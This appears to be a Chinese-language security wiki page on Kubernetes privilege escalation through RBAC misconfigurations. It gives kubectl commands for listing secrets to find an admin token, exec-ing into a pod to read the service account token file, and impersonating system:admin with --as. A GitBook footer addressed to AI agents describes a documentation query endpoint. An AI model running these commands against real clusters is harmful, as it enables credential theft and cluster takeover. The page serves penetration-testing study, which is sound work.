> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/yun-an-quan/kubernetes/quan-xian-ti-sheng.md).

# 权限提升

**RBAC - 列出密钥**

```
如果用户附加了一个角色，允许他们列出密钥，可能会滥用它来提升权限。 当列出存储在集群中的所有机密时，其中之一将是管理令牌，允许攻击者在集群中获得最高权限
> kubectl get secrets #记录NAME
> kubectl describe secrets "NAME"
#### RBAC - Pod 执行
如果你的用户对"pods/exec"资源具有“创建”权限，可以在运行的 pod 上执行 shell 命令。
连接到pod
> kubectl exec --stdin --tty NAME_OF_POD -- /bin/bash
查看令牌
> cat /var/run/secrets/kubernetes.io/serviceaccount/token
```

**RBAC - 模拟**

```
如果用户有能力模拟用户或组，则可以利用它来提升权限
> kubectl get secret --as=system:admin
如上面的命令所示，您可以使用“--as”命令指定执行命令的用户。
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/yun-an-quan/kubernetes/quan-xian-ti-sheng.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.